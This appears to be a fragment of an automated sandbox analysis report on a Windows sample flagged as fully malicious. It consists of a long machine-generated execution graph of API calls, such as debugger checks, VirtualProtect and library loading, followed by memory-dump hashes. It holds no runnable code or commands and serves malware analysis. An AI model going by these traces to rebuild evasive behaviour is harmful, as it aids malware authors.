                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:true

                      Execution Graph

                      Execution Coverage:3.9%
                      Dynamic/Decrypted Code Coverage:6.8%
                      Signature Coverage:9%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:55
429c0b 109024->109041 109026 422c59 109027 422c88 DecodePointer DecodePointer 109026->109027 109028 422c65 109027->109028 109029 422cb5 109027->109029 109038 422c82 109028->109038 109029->109028 109087 4287a4 59 API calls __wfsopen 109029->109087 109031 422d18 EncodePointer EncodePointer 109031->109028 109032 422cec 109032->109028 109036 422d06 EncodePointer 109032->109036 109089 428864 61 API calls 2 library calls 109032->109089 109033 422cc7 109033->109031 109033->109032 109088 428864 61 API calls 2 library calls 109033->109088 109036->109031 109037 422d00 109037->109028 109037->109036 109090 423220 109038->109090 109042 429c2f EnterCriticalSection 109041->109042 109043 429c1c 109041->109043 109042->109026 109048 429c93 109043->109048 109045 429c22 109045->109042 109072 4230b5 58 API calls 3 library calls 109045->109072 109049 429c9f __wfsopen 109048->109049 109050 429cc0 109049->109050 109051 429ca8 109049->109051 109060 429ce1 __wfsopen 109050->109060 109076 42881d 58 API calls 2 library calls 109050->109076 109073 42a16b 58 API calls 2 library calls 109051->109073 109053 429cad 109074 42a1c8 58 API calls 8 library calls 109053->109074 109056 429cd5 109058 429ceb 109056->109058 109059 429cdc 109056->109059 109057 429cb4 109075 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109057->109075 109063 429c0b __lock 58 API calls 109058->109063 109077 428b28 58 API calls __getptd_noexit 109059->109077 109060->109045 109065 429cf2 109063->109065 109066 429d17 109065->109066 109067 429cff 109065->109067 109079 422d55 109066->109079 109078 429e2b InitializeCriticalSectionAndSpinCount 109067->109078 109070 429d0b 109085 429d33 LeaveCriticalSection _doexit 109070->109085 109073->109053 109074->109057 109076->109056 109077->109060 109078->109070 109080 422d5e RtlFreeHeap 109079->109080 109084 422d87 _free 109079->109084 109081 422d73 109080->109081 109080->109084 109086 428b28 58 API calls __getptd_noexit 109081->109086 109083 422d79 GetLastError 
109083->109084 109084->109070 109085->109060 109086->109083 109087->109033 109088->109032 109089->109037 109093 429d75 LeaveCriticalSection 109090->109093 109092 422c87 109092->109023 109093->109092 109095 40f43a 109094->109095 109097 40f2bc 109094->109097 109253 469e4a 89 API calls 4 library calls 109095->109253 109097->109095 109106 40f2f9 _memmove 109097->109106 109098 40f3d3 109099 40f3e3 109098->109099 109252 47a2d9 85 API calls Mailbox 109098->109252 109099->108942 109101 420db6 59 API calls Mailbox 109101->109106 109102 4443f9 109255 40f6a3 341 API calls 109102->109255 109104 409ea0 341 API calls 109104->109106 109105 4443a9 109105->108942 109106->109098 109106->109101 109106->109102 109106->109104 109106->109105 109107 4443ab 109106->109107 109254 469e4a 89 API calls 4 library calls 109107->109254 109256 47cadd 109109->109256 109111 47df47 109111->108946 109388 46445a GetFileAttributesW 109112->109388 109116 404e54 109115->109116 109117 404e5b 109115->109117 109392 4253a6 109116->109392 109119 404e6a 109117->109119 109120 404e7b FreeLibrary 109117->109120 109119->108946 109120->109119 109122 407667 59 API calls 109121->109122 109123 46cbaf 109122->109123 109124 407667 59 API calls 109123->109124 109125 46cbb8 109124->109125 109126 46cbcc 109125->109126 109858 409b3c 109125->109858 109128 409837 84 API calls 109126->109128 109129 46cbe9 109128->109129 109130 46ccea 109129->109130 109131 46cc0b 109129->109131 109143 46cd1a Mailbox 109129->109143 109662 404ddd 109130->109662 109132 409837 84 API calls 109131->109132 109134 46cc17 109132->109134 109136 408047 59 API calls 109134->109136 109139 46cc23 109136->109139 109137 46cd16 109137->109143 109145 46cc37 109139->109145 109146 46cc69 109139->109146 109143->108946 109149 408047 59 API calls 109145->109149 109147 409837 84 API calls 109146->109147 109150 46cc76 109147->109150 109152 46cc47 109149->109152 109153 408047 59 API calls 109150->109153 109862 407cab 109152->109862 109157 46cc82 109153->109157 109869 
464a31 GetFileAttributesW 109157->109869 109159 409837 84 API calls 109162 46cc5d 109159->109162 109165 407b2e 59 API calls 109162->109165 109163 46cc8b 109166 46cc9e 109163->109166 109169 4079f2 59 API calls 109163->109169 109165->109146 109168 409837 84 API calls 109166->109168 109176 46cca4 109166->109176 109171 46cccb 109168->109171 109169->109166 109870 4637ef 75 API calls Mailbox 109171->109870 109176->109143 109202 409837 84 API calls 109201->109202 109203 474494 109202->109203 110335 406240 109203->110335 109205 4744a4 109206 4744c9 109205->109206 109207 409ea0 341 API calls 109205->109207 109209 4744cd 109206->109209 110360 409a98 109206->110360 109207->109206 109209->108946 109210->108946 109212 47bc96 109211->109212 109213 47bcb0 109211->109213 110386 469e4a 89 API calls 4 library calls 109212->110386 110387 47a213 59 API calls Mailbox 109213->110387 109216 47bcbb 109217 409ea0 340 API calls 109216->109217 109218 47bd1c 109217->109218 109219 47bdae 109218->109219 109222 47bd5d 109218->109222 109244 47bca8 Mailbox 109218->109244 109220 47be04 109219->109220 109221 47bdb4 109219->109221 109223 409837 84 API calls 109220->109223 109220->109244 110389 46791a 59 API calls 109221->110389 110388 4672df 59 API calls Mailbox 109222->110388 109225 47be16 109223->109225 109228 407e4f 59 API calls 109225->109228 109226 47bdd7 110390 405d41 59 API calls Mailbox 109226->110390 109229 47be3a CharUpperBuffW 109228->109229 109234 47be54 109229->109234 109231 47bd8d 109233 40f460 340 API calls 109231->109233 109232 47bddf Mailbox 109237 40fce0 340 API calls 109232->109237 109233->109244 109235 47bea7 109234->109235 109236 47be5b 109234->109236 109238 409837 84 API calls 109235->109238 110391 4672df 59 API calls Mailbox 109236->110391 109237->109244 109239 47beaf 109238->109239 110392 409e5d 60 API calls 109239->110392 109242 47be89 109243 40f460 340 API calls 109242->109243 109243->109244 109244->108940 109245 47beb9 109245->109244 109246 409837 84 API calls 
109245->109246 109247 47bed4 109246->109247 110393 405d41 59 API calls Mailbox 109247->110393 109249 47bee4 109250 40fce0 340 API calls 109249->109250 109250->109244 109251->108944 109252->109099 109253->109105 109254->109105 109255->109105 109257 409837 84 API calls 109256->109257 109258 47cb1a 109257->109258 109263 47cb61 Mailbox 109258->109263 109294 47d7a5 109258->109294 109260 47cf2e 109344 47d8c8 92 API calls Mailbox 109260->109344 109263->109111 109264 47cf3d 109265 47cdc7 109264->109265 109267 47cf49 109264->109267 109307 47c96e 109265->109307 109266 409837 84 API calls 109272 47cbb2 Mailbox 109266->109272 109267->109263 109272->109263 109272->109266 109281 47cdb9 109272->109281 109326 47fbce 59 API calls 2 library calls 109272->109326 109327 47cfdf 61 API calls 2 library calls 109272->109327 109273 47ce00 109322 420c08 109273->109322 109276 47ce33 109329 4092ce 109276->109329 109277 47ce1a 109328 469e4a 89 API calls 4 library calls 109277->109328 109280 47ce25 GetCurrentProcess TerminateProcess 109280->109276 109281->109260 109281->109265 109286 47cfa4 109286->109263 109290 47cfb8 FreeLibrary 109286->109290 109287 47ce6b 109341 47d649 107 API calls _free 109287->109341 109290->109263 109293 47ce7c 109293->109286 109342 408d40 59 API calls Mailbox 109293->109342 109343 409d3c 60 API calls Mailbox 109293->109343 109345 47d649 107 API calls _free 109293->109345 109295 407e4f 59 API calls 109294->109295 109296 47d7c0 CharLowerBuffW 109295->109296 109346 45f167 109296->109346 109300 407667 59 API calls 109301 47d7f9 109300->109301 109353 40784b 109301->109353 109303 47d858 Mailbox 109303->109272 109304 47d810 109366 407d2c 109304->109366 109306 47d81c Mailbox 109306->109303 109370 47cfdf 61 API calls 2 library calls 109306->109370 109308 47c989 109307->109308 109312 47c9de 109307->109312 109309 420db6 Mailbox 59 API calls 109308->109309 109311 47c9ab 109309->109311 109310 420db6 Mailbox 59 API calls 109310->109311 109311->109310 109311->109312 109313 47da50 
109312->109313 109314 47dc79 Mailbox 109313->109314 109321 47da73 _strcat _wcscpy __wsetenvp 109313->109321 109314->109273 109315 409be6 59 API calls 109315->109321 109316 409b3c 59 API calls 109316->109321 109317 409b98 59 API calls 109317->109321 109318 409837 84 API calls 109318->109321 109319 42571c 58 API calls __crtLCMapStringA_stat 109319->109321 109321->109314 109321->109315 109321->109316 109321->109317 109321->109318 109321->109319 109377 465887 61 API calls 2 library calls 109321->109377 109324 420c1d 109322->109324 109323 420cb5 VirtualProtect 109325 420c83 109323->109325 109324->109323 109324->109325 109325->109276 109325->109277 109326->109272 109327->109272 109328->109280 109330 4092d6 109329->109330 109331 420db6 Mailbox 59 API calls 109330->109331 109332 4092e4 109331->109332 109333 4092f0 109332->109333 109378 4091fc 59 API calls Mailbox 109332->109378 109335 409050 109333->109335 109379 409160 109335->109379 109337 40905f 109338 420db6 Mailbox 59 API calls 109337->109338 109339 4090fb 109337->109339 109338->109339 109339->109293 109340 408d40 59 API calls Mailbox 109339->109340 109340->109287 109341->109293 109342->109293 109343->109293 109344->109264 109345->109293 109348 45f192 __wsetenvp 109346->109348 109347 45f1d1 109347->109300 109347->109306 109348->109347 109349 45f1c7 109348->109349 109350 45f278 109348->109350 109349->109347 109371 4078c4 61 API calls 109349->109371 109350->109347 109372 4078c4 61 API calls 109350->109372 109354 4078b7 109353->109354 109355 40785a 109353->109355 109356 407d2c 59 API calls 109354->109356 109355->109354 109357 407865 109355->109357 109358 407888 _memmove 109356->109358 109359 407880 109357->109359 109360 43eb09 109357->109360 109358->109304 109373 407f27 59 API calls Mailbox 109359->109373 109374 408029 109360->109374 109363 43eb13 109364 420db6 Mailbox 59 API calls 109363->109364 109365 43eb33 109364->109365 109367 407d43 _memmove 109366->109367 109368 407d3a 109366->109368 109367->109306 109368->109367 
109369 407e4f 59 API calls 109368->109369 109369->109367 109370->109303 109371->109349 109372->109350 109373->109358 109375 420db6 Mailbox 59 API calls 109374->109375 109376 408033 109375->109376 109376->109363 109377->109321 109378->109333 109380 409169 Mailbox 109379->109380 109381 43f19f 109380->109381 109386 409173 109380->109386 109382 420db6 Mailbox 59 API calls 109381->109382 109384 43f1ab 109382->109384 109383 40917a 109383->109337 109386->109383 109387 409c90 59 API calls Mailbox 109386->109387 109387->109386 109389 464475 FindFirstFileW 109388->109389 109390 463c3e 109388->109390 109389->109390 109391 46448a FindClose 109389->109391 109390->108946 109391->109390 109393 4253b2 __wfsopen 109392->109393 109394 4253c6 109393->109394 109395 4253de 109393->109395 109427 428b28 58 API calls __getptd_noexit 109394->109427 109401 4253d6 __wfsopen 109395->109401 109405 426c11 109395->109405 109397 4253cb 109428 428db6 9 API calls __wfsopen 109397->109428 109401->109117 109406 426c43 EnterCriticalSection 109405->109406 109407 426c21 109405->109407 109409 4253f0 109406->109409 109407->109406 109408 426c29 109407->109408 109410 429c0b __lock 58 API calls 109408->109410 109411 42533a 109409->109411 109410->109409 109412 425349 109411->109412 109413 42535d 109411->109413 109473 428b28 58 API calls __getptd_noexit 109412->109473 109425 425359 109413->109425 109430 424a3d 109413->109430 109416 42534e 109474 428db6 9 API calls __wfsopen 109416->109474 109422 425377 109447 430a02 109422->109447 109424 42537d 109424->109425 109426 422d55 _free 58 API calls 109424->109426 109429 425415 LeaveCriticalSection LeaveCriticalSection __wfsopen 109425->109429 109426->109425 109427->109397 109428->109401 109429->109401 109431 424a50 109430->109431 109432 424a74 109430->109432 109431->109432 109433 4246e6 __ftell_nolock 58 API calls 109431->109433 109436 430b77 109432->109436 109434 424a6d 109433->109434 109475 42d886 109434->109475 109437 425371 109436->109437 109438 430b84 
109436->109438 109440 4246e6 109437->109440 109438->109437 109439 422d55 _free 58 API calls 109438->109439 109439->109437 109441 4246f0 109440->109441 109442 424705 109440->109442 109617 428b28 58 API calls __getptd_noexit 109441->109617 109442->109422 109444 4246f5 109618 428db6 9 API calls __wfsopen 109444->109618 109446 424700 109446->109422 109448 430a0e __wfsopen 109447->109448 109449 430a32 109448->109449 109450 430a1b 109448->109450 109452 430abd 109449->109452 109454 430a42 109449->109454 109634 428af4 58 API calls __getptd_noexit 109450->109634 109639 428af4 58 API calls __getptd_noexit 109452->109639 109453 430a20 109635 428b28 58 API calls __getptd_noexit 109453->109635 109457 430a60 109454->109457 109458 430a6a 109454->109458 109636 428af4 58 API calls __getptd_noexit 109457->109636 109460 42d206 ___lock_fhandle 59 API calls 109458->109460 109459 430a65 109640 428b28 58 API calls __getptd_noexit 109459->109640 109463 430a70 109460->109463 109465 430a83 109463->109465 109466 430a8e 109463->109466 109464 430ac9 109641 428db6 9 API calls __wfsopen 109464->109641 109619 430add 109465->109619 109637 428b28 58 API calls __getptd_noexit 109466->109637 109469 430a27 __wfsopen 109469->109424 109471 430a89 109638 430ab5 LeaveCriticalSection __unlock_fhandle 109471->109638 109473->109416 109474->109425 109476 42d892 __wfsopen 109475->109476 109477 42d8b6 109476->109477 109478 42d89f 109476->109478 109480 42d955 109477->109480 109482 42d8ca 109477->109482 109576 428af4 58 API calls __getptd_noexit 109478->109576 109582 428af4 58 API calls __getptd_noexit 109480->109582 109481 42d8a4 109577 428b28 58 API calls __getptd_noexit 109481->109577 109485 42d8f2 109482->109485 109486 42d8e8 109482->109486 109503 42d206 109485->109503 109578 428af4 58 API calls __getptd_noexit 109486->109578 109487 42d8ed 109583 428b28 58 API calls __getptd_noexit 109487->109583 109490 42d8f8 109492 42d90b 109490->109492 109493 42d91e 109490->109493 109512 42d975 109492->109512 109579 428b28 
58 API calls __getptd_noexit 109493->109579 109494 42d961 109584 428db6 9 API calls __wfsopen 109494->109584 109497 42d8ab __wfsopen 109497->109432 109499 42d917 109581 42d94d LeaveCriticalSection __unlock_fhandle 109499->109581 109500 42d923 109580 428af4 58 API calls __getptd_noexit 109500->109580 109504 42d212 __wfsopen 109503->109504 109505 42d261 EnterCriticalSection 109504->109505 109507 429c0b __lock 58 API calls 109504->109507 109506 42d287 __wfsopen 109505->109506 109506->109490 109508 42d237 109507->109508 109509 42d24f 109508->109509 109585 429e2b InitializeCriticalSectionAndSpinCount 109508->109585 109586 42d28b LeaveCriticalSection _doexit 109509->109586 109513 42d982 __ftell_nolock 109512->109513 109514 42d9e0 109513->109514 109515 42d9c1 109513->109515 109543 42d9b6 109513->109543 109519 42da38 109514->109519 109520 42da1c 109514->109520 109596 428af4 58 API calls __getptd_noexit 109515->109596 109518 42d9c6 109597 428b28 58 API calls __getptd_noexit 109518->109597 109523 42da51 109519->109523 109602 4318c1 60 API calls 3 library calls 109519->109602 109599 428af4 58 API calls __getptd_noexit 109520->109599 109521 42e1d6 109521->109499 109587 435c6b 109523->109587 109525 42d9cd 109598 428db6 9 API calls __wfsopen 109525->109598 109528 42da21 109600 428b28 58 API calls __getptd_noexit 109528->109600 109530 42da5f 109532 42ddb8 109530->109532 109603 4299ac 58 API calls 2 library calls 109530->109603 109534 42ddd6 109532->109534 109535 42e14b WriteFile 109532->109535 109533 42da28 109601 428db6 9 API calls __wfsopen 109533->109601 109538 42defa 109534->109538 109547 42ddec 109534->109547 109539 42ddab GetLastError 109535->109539 109545 42dd78 109535->109545 109549 42df05 109538->109549 109553 42dfef 109538->109553 109539->109545 109540 42da8b GetConsoleMode 109540->109532 109542 42daca 109540->109542 109541 42e184 109541->109543 109608 428b28 58 API calls __getptd_noexit 109541->109608 109542->109532 109546 42dada GetConsoleCP 109542->109546 109610 
42c5f6 109543->109610 109545->109541 109545->109543 109552 42ded8 109545->109552 109546->109541 109562 42db09 109546->109562 109547->109541 109548 42de5b WriteFile 109547->109548 109548->109539 109550 42de98 109548->109550 109549->109541 109554 42df6a WriteFile 109549->109554 109550->109547 109571 42debc 109550->109571 109551 42e1b2 109609 428af4 58 API calls __getptd_noexit 109551->109609 109556 42dee3 109552->109556 109557 42e17b 109552->109557 109553->109541 109558 42e064 WideCharToMultiByte 109553->109558 109554->109539 109559 42dfb9 109554->109559 109605 428b28 58 API calls __getptd_noexit 109556->109605 109607 428b07 58 API calls 3 library calls 109557->109607 109558->109539 109569 42e0ab 109558->109569 109559->109545 109559->109549 109559->109571 109562->109545 109568 4362ba 60 API calls __write_nolock 109562->109568 109572 42dbf2 WideCharToMultiByte 109562->109572 109575 42dc5f 109562->109575 109604 4235f5 58 API calls __isleadbyte_l 109562->109604 109563 42e0b3 WriteFile 109566 42e106 GetLastError 109563->109566 109563->109569 109564 42dee8 109606 428af4 58 API calls __getptd_noexit 109564->109606 109566->109569 109568->109562 109569->109545 109569->109553 109569->109563 109569->109571 109570 437a5e WriteConsoleW CreateFileW __putwch_nolock 109570->109575 109571->109545 109572->109545 109573 42dc2d WriteFile 109572->109573 109573->109539 109573->109575 109574 42dc87 WriteFile 109574->109539 109574->109575 109575->109539 109575->109545 109575->109562 109575->109570 109575->109574 109576->109481 109577->109497 109578->109487 109579->109500 109580->109499 109581->109497 109582->109487 109583->109494 109584->109497 109585->109509 109586->109505 109588 435c83 109587->109588 109589 435c76 109587->109589 109591 435c8f 109588->109591 109592 428b28 __wfsopen 58 API calls 109588->109592 109590 428b28 __wfsopen 58 API calls 109589->109590 109593 435c7b 109590->109593 109591->109530 109594 435cb0 109592->109594 109593->109530 109595 428db6 __wfsopen 9 API calls 
109594->109595 109595->109593 109596->109518 109597->109525 109598->109543 109599->109528 109600->109533 109601->109543 109602->109523 109603->109540 109604->109562 109605->109564 109606->109543 109607->109543 109608->109551 109609->109543 109611 42c600 IsProcessorFeaturePresent 109610->109611 109612 42c5fe 109610->109612 109614 43590a 109611->109614 109612->109521 109615 4358b9 ___raise_securityfailure 5 API calls 109614->109615 109616 4359ed 109615->109616 109616->109521 109617->109444 109618->109446 109642 42d4c3 109619->109642 109621 430b41 109655 42d43d 59 API calls 2 library calls 109621->109655 109623 430aeb 109623->109621 109624 430b1f 109623->109624 109626 42d4c3 __commit 58 API calls 109623->109626 109624->109621 109627 42d4c3 __commit 58 API calls 109624->109627 109625 430b49 109628 430b6b 109625->109628 109656 428b07 58 API calls 3 library calls 109625->109656 109629 430b16 109626->109629 109630 430b2b CloseHandle 109627->109630 109628->109471 109633 42d4c3 __commit 58 API calls 109629->109633 109630->109621 109631 430b37 GetLastError 109630->109631 109631->109621 109633->109624 109634->109453 109635->109469 109636->109459 109637->109471 109638->109469 109639->109459 109640->109464 109641->109469 109643 42d4e3 109642->109643 109644 42d4ce 109642->109644 109649 42d508 109643->109649 109659 428af4 58 API calls __getptd_noexit 109643->109659 109657 428af4 58 API calls __getptd_noexit 109644->109657 109646 42d4d3 109658 428b28 58 API calls __getptd_noexit 109646->109658 109649->109623 109650 42d512 109660 428b28 58 API calls __getptd_noexit 109650->109660 109651 42d4db 109651->109623 109653 42d51a 109661 428db6 9 API calls __wfsopen 109653->109661 109655->109625 109656->109628 109657->109646 109658->109651 109659->109650 109660->109653 109661->109651 109880 404bb5 109662->109880 109667 43d8e6 109670 404e4a 84 API calls 109667->109670 109668 404e08 LoadLibraryExW 109890 404b6a 109668->109890 109672 43d8ed 109670->109672 109674 404b6a 3 API calls 
109672->109674 109676 43d8f5 109674->109676 109675 404e2f 109675->109676 109677 404e3b 109675->109677 109916 404f0b 109676->109916 109678 404e4a 84 API calls 109677->109678 109681 404e40 109678->109681 109681->109137 109683 43d91c 109924 404ec7 109683->109924 109859 409b52 109858->109859 109860 409b4d 109858->109860 109859->109126 109860->109859 110328 42358a 59 API calls 109860->110328 109863 43ed4a 109862->109863 109864 407cbf 109862->109864 109866 408029 59 API calls 109863->109866 110329 407c50 109864->110329 109868 43ed55 __wsetenvp _memmove 109866->109868 109867 407cca 109867->109159 109869->109163 109870->109176 109929 404c03 109880->109929 109883 404bdc 109884 404bf5 109883->109884 109885 404bec FreeLibrary 109883->109885 109887 42525b 109884->109887 109885->109884 109886 404c03 2 API calls 109886->109883 109933 425270 109887->109933 109889 404dfc 109889->109667 109889->109668 110014 404c36 109890->110014 109893 404b8f 109894 404ba1 FreeLibrary 109893->109894 109895 404baa 109893->109895 109894->109895 109897 404c70 109895->109897 109896 404c36 2 API calls 109896->109893 109898 420db6 Mailbox 59 API calls 109897->109898 109899 404c85 109898->109899 110018 40522e 109899->110018 109901 404c91 _memmove 109902 404ccc 109901->109902 109904 404dc1 109901->109904 109905 404d89 109901->109905 109903 404ec7 69 API calls 109902->109903 109913 404cd5 109903->109913 110032 46991b 95 API calls 109904->110032 110021 404e89 CreateStreamOnHGlobal 109905->110021 109908 404f0b 74 API calls 109908->109913 109910 404d69 109910->109675 109911 43d8a7 109912 404ee5 85 API calls 109911->109912 109914 43d8bb 109912->109914 109913->109908 109913->109910 109913->109911 110027 404ee5 109913->110027 109915 404f0b 74 API calls 109914->109915 109915->109910 109917 404f1d 109916->109917 109920 43d9cd 109916->109920 110050 4255e2 109917->110050 109921 469109 110175 468f5f 109921->110175 109923 46911f 109923->109683 109925 43d990 109924->109925 109926 404ed6 109924->109926 110180 425c60 
109926->110180 109930 404bd0 109929->109930 109931 404c0c LoadLibraryA 109929->109931 109930->109883 109930->109886 109931->109930 109932 404c1d GetProcAddress 109931->109932 109932->109930 109935 42527c __wfsopen 109933->109935 109934 42528f 109982 428b28 58 API calls __getptd_noexit 109934->109982 109935->109934 109938 4252c0 109935->109938 109937 425294 109983 428db6 9 API calls __wfsopen 109937->109983 109952 4304e8 109938->109952 109941 4252c5 109942 4252db 109941->109942 109943 4252ce 109941->109943 109945 425305 109942->109945 109946 4252e5 109942->109946 109984 428b28 58 API calls __getptd_noexit 109943->109984 109967 430607 109945->109967 109985 428b28 58 API calls __getptd_noexit 109946->109985 109951 42529f __wfsopen @_EH4_CallFilterFunc@8 109951->109889 109953 4304f4 __wfsopen 109952->109953 109954 429c0b __lock 58 API calls 109953->109954 109965 430502 109954->109965 109955 430576 109987 4305fe 109955->109987 109956 43057d 109992 42881d 58 API calls 2 library calls 109956->109992 109959 430584 109959->109955 109993 429e2b InitializeCriticalSectionAndSpinCount 109959->109993 109960 4305f3 __wfsopen 109960->109941 109962 429c93 __mtinitlocknum 58 API calls 109962->109965 109964 4305aa EnterCriticalSection 109964->109955 109965->109955 109965->109956 109965->109962 109990 426c50 59 API calls __lock 109965->109990 109991 426cba LeaveCriticalSection LeaveCriticalSection _doexit 109965->109991 109968 430627 __wopenfile 109967->109968 109969 430641 109968->109969 109981 4307fc 109968->109981 110000 4237cb 60 API calls 2 library calls 109968->110000 109998 428b28 58 API calls __getptd_noexit 109969->109998 109971 430646 109999 428db6 9 API calls __wfsopen 109971->109999 109973 425310 109986 425332 LeaveCriticalSection LeaveCriticalSection __wfsopen 109973->109986 109974 43085f 109995 4385a1 109974->109995 109977 4307f5 109977->109981 110001 4237cb 60 API calls 2 library calls 109977->110001 109979 430814 109979->109981 110002 4237cb 60 API calls 2 library 
calls 109979->110002 109981->109969 109981->109974 109982->109937 109983->109951 109984->109951 109985->109951 109986->109951 109994 429d75 LeaveCriticalSection 109987->109994 109989 430605 109989->109960 109990->109965 109991->109965 109992->109959 109993->109964 109994->109989 110003 437d85 109995->110003 109997 4385ba 109997->109973 109998->109971 109999->109973 110000->109977 110001->109979 110002->109981 110006 437d91 __wfsopen 110003->110006 110004 437da7 110005 428b28 __wfsopen 58 API calls 110004->110005 110007 437dac 110005->110007 110006->110004 110008 437ddd 110006->110008 110010 428db6 __wfsopen 9 API calls 110007->110010 110009 437e4e __wsopen_nolock 109 API calls 110008->110009 110011 437df9 110009->110011 110013 437db6 __wfsopen 110010->110013 110012 437e22 __wsopen_helper LeaveCriticalSection 110011->110012 110012->110013 110013->109997 110015 404b83 110014->110015 110016 404c3f LoadLibraryA 110014->110016 110015->109893 110015->109896 110016->110015 110017 404c50 GetProcAddress 110016->110017 110017->110015 110019 420db6 Mailbox 59 API calls 110018->110019 110020 405240 110019->110020 110020->109901 110022 404ea3 FindResourceExW 110021->110022 110026 404ec0 110021->110026 110023 43d933 LoadResource 110022->110023 110022->110026 110024 43d948 SizeofResource 110023->110024 110023->110026 110025 43d95c LockResource 110024->110025 110024->110026 110025->110026 110026->109902 110028 404ef4 110027->110028 110029 43d9ab 110027->110029 110033 42584d 110028->110033 110032->109902 110037 425859 __wfsopen 110033->110037 110034 42586b 110036 425891 110037->110034 110037->110036 110053 4255fd 110050->110053 110052 404f2e 110052->109921 110055 425609 __wfsopen 110053->110055 110054 425644 __wfsopen 110054->110052 110055->110054 110056 42561f _memset 110055->110056 110057 42564c 110055->110057 110080 428b28 58 API calls __getptd_noexit 110056->110080 110058 426c11 __lock_file 59 API calls 110057->110058 110059 425652 110058->110059 110066 42541d 110059->110066 
110061 425639 110081 428db6 9 API calls __wfsopen 110061->110081 110070 425438 _memset 110066->110070 110072 425453 110066->110072 110067 425443 110171 428b28 58 API calls __getptd_noexit 110067->110171 110069 425448 110172 428db6 9 API calls __wfsopen 110069->110172 110070->110067 110070->110072 110077 425493 110070->110077 110082 425686 LeaveCriticalSection LeaveCriticalSection __wfsopen 110072->110082 110074 4255a4 _memset 110174 428b28 58 API calls __getptd_noexit 110074->110174 110075 4246e6 __ftell_nolock 58 API calls 110075->110077 110077->110072 110077->110074 110077->110075 110083 430e5b 110077->110083 110151 430ba7 110077->110151 110173 430cc8 58 API calls 3 library calls 110077->110173 110080->110061 110081->110054 110082->110054 110084 430e93 110083->110084 110085 430e7c 110083->110085 110087 4315cb 110084->110087 110091 430ecd 110084->110091 110086 428af4 __lseeki64 58 API calls 110085->110086 110088 430e81 110086->110088 110089 428af4 __lseeki64 58 API calls 110087->110089 110090 428b28 __wfsopen 58 API calls 110088->110090 110092 4315d0 110089->110092 110095 430e88 110090->110095 110093 430ed5 110091->110093 110101 430eec 110091->110101 110094 428b28 __wfsopen 58 API calls 110092->110094 110096 428af4 __lseeki64 58 API calls 110093->110096 110095->110077 110100 430f01 110101->110095 110101->110100 110103 430f1b 110101->110103 110105 430f39 110101->110105 110103->110100 110152 430bb2 110151->110152 110155 430bc7 110151->110155 110153 428b28 __wfsopen 58 API calls 110152->110153 110154 430bb7 110153->110154 110156 428db6 __wfsopen 9 API calls 110154->110156 110157 430bfc 110155->110157 110158 435fe4 __getbuf 58 API calls 110155->110158 110162 430bc2 110155->110162 110156->110162 110159 4246e6 __ftell_nolock 58 API calls 110157->110159 110158->110157 110160 430c10 110159->110160 110162->110077 110171->110069 110172->110072 110173->110077 110174->110069 110178 42520a GetSystemTimeAsFileTime 110175->110178 110177 468f6e 110177->109923 110179 425238 
__aulldiv 110178->110179 110179->110177 110328->109859 110330 407c5f __wsetenvp 110329->110330 110331 408029 59 API calls 110330->110331 110332 407c70 _memmove 110330->110332 110333 43ed07 _memmove 110331->110333 110332->109867 110373 407a16 110335->110373 110337 40646a 110380 40750f 59 API calls 2 library calls 110337->110380 110339 406484 Mailbox 110339->109205 110342 43dff6 110383 45f8aa 91 API calls 4 library calls 110342->110383 110343 407d8c 59 API calls 110354 406265 110343->110354 110344 40750f 59 API calls 110344->110354 110348 43e004 110384 40750f 59 API calls 2 library calls 110348->110384 110350 43e01a 110350->110339 110351 406799 _memmove 110385 45f8aa 91 API calls 4 library calls 110351->110385 110352 43df92 110353 408029 59 API calls 110352->110353 110355 43df9d 110353->110355 110354->110337 110354->110342 110354->110343 110354->110344 110354->110351 110354->110352 110357 407e4f 59 API calls 110354->110357 110378 405f6c 60 API calls 110354->110378 110379 405d41 59 API calls Mailbox 110354->110379 110381 405e72 60 API calls 110354->110381 110382 407924 59 API calls 2 library calls 110354->110382 110359 420db6 Mailbox 59 API calls 110355->110359 110358 40643b CharUpperBuffW 110357->110358 110358->110354 110359->110351 110361 43f7d6 110360->110361 110362 409aa8 110360->110362 110363 43f7e7 110361->110363 110364 407bcc 59 API calls 110361->110364 110367 420db6 Mailbox 59 API calls 110362->110367 110365 407d8c 59 API calls 110363->110365 110364->110363 110366 43f7f1 110365->110366 110370 407667 59 API calls 110366->110370 110372 409ad4 110366->110372 110368 409abb 110367->110368 110368->110366 110369 409ac6 110368->110369 110371 407de1 59 API calls 110369->110371 110369->110372 110370->110372 110371->110372 110372->109209 110374 420db6 Mailbox 59 API calls 110373->110374 110375 407a3b 110374->110375 110376 408029 59 API calls 110375->110376 110377 407a4a 110376->110377 110377->110354 110378->110354 110379->110354 110380->110339 110381->110354 
calls 112054->112059 112061 45f4c4 112054->112061 112055 40784b 59 API calls 112056 45f4dd 112055->112056 112057 407b2e 59 API calls 112056->112057 112058 45f4e9 112057->112058 112060 407f77 59 API calls 112058->112060 112062 45f4f8 Mailbox 112058->112062 112059->112054 112060->112062 112061->112055 112062->111881 112063->111935 112064->111897 112065->111933 112066->111933 112067->111967 112069 4560e8 112068->112069 112070 4560cb 112068->112070 112069->111976 112070->112069 112072 4560ab 59 API calls Mailbox 112070->112072 112072->112070
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID: d$w
                      • API String ID: 0-2400632791
                      • Opcode ID: 378f68918cc0b3db45ddcf6f9755583a86a421057d9099b696362869345d0b54
                      • Instruction ID: 103abd3e9a3807fd7d6031e97e4ce82358cddec753ab692de6e35a18aaa822c6
                      • Opcode Fuzzy Hash: 378f68918cc0b3db45ddcf6f9755583a86a421057d9099b696362869345d0b54
                      • Instruction Fuzzy Hash: 95C13922E0C340AEEB354A64CC09B397B65AB52BECF4D056BE746CA1F2D7658804CB52

                      Control-flow Graph

                      APIs
                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                      • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
